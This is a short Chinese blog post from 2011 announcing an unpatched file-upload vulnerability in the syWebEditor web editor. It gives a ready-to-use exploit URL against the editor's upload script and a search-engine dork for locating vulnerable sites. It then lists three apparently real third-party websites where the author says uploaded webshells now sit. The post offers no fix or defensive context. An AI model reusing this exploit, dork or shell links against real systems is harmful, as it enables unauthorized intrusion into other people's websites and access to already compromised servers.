当前位置: iick's blog > 网站漏洞 > syWebEditor编辑器最新0day

syWebEditor编辑器最新0day

作者:hack1990 时间:11-04-06 阅读数:770人阅读

syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的

编辑器一样。

exp:http://www.xxx.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%

7C&filePathType=1&filePath=/PhotoFile/ProFile/

上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。

关键字:inurl:syWebEditor

 

至于拿shell  很简单 随便找了几个试了下  

http://www.nyhfjy.cn/sb.asp

http://kone112233.w22.ivip.cn/hack1990.asp  

http://wylsw.333200.net/aspx/hack1990.asp 

 

 

 

# XSS回旋镖测试# Linux启用未使用的硬盘空间# MySQL数据库猜密码脚本PHP版# Nmap Security Scanner 7.0

上一篇:北京中关村分站注入漏洞

下一篇:蓝海豚团购系统多处漏洞及修补

相关文章

评论列表

  •  
    发布于 2011-04-07 11:43:53  回复
  • 博主的文章很有深度哦!
  •  
    发布于 2011-04-08 07:46:16  回复
  • 谢谢您的评价 -0-

发表评论